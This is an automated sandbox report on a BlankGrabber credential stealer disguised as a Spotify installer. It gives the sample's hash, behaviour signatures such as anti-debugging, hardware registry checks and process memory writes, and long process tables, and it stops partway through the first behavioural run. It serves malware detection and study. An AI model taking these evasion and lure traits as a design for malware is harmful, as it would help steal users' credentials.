Malware Analysis Report

2024-10-10 08:28

Sample ID 240621-3k7mrawand
Target SpotifySetup.exe
SHA256 b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1
Tags
upx execution blankgrabber
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1

Threat Level: Known bad

The file SpotifySetup.exe was found to be: Known bad.

Malicious Activity Summary

upx execution blankgrabber

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Command and Scripting Interpreter: PowerShell

UPX packed file

ACProtect 1.3x - 1.4x DLL software

Loads dropped DLL

Executes dropped EXE

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Detects videocard installed

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 23:35

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 23:35

Reported

2024-06-21 23:39

Platform

win7-20240611-en

Max time kernel

150s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"

Signatures

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1744 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 1904 wrote to memory of 1836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 1836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 1836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 376 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 376 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 376 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1904 wrote to memory of 2068 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe

"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"

C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe

"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5c69758,0x7fef5c69768,0x7fef5c69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1536 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2344 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2356 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1436 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

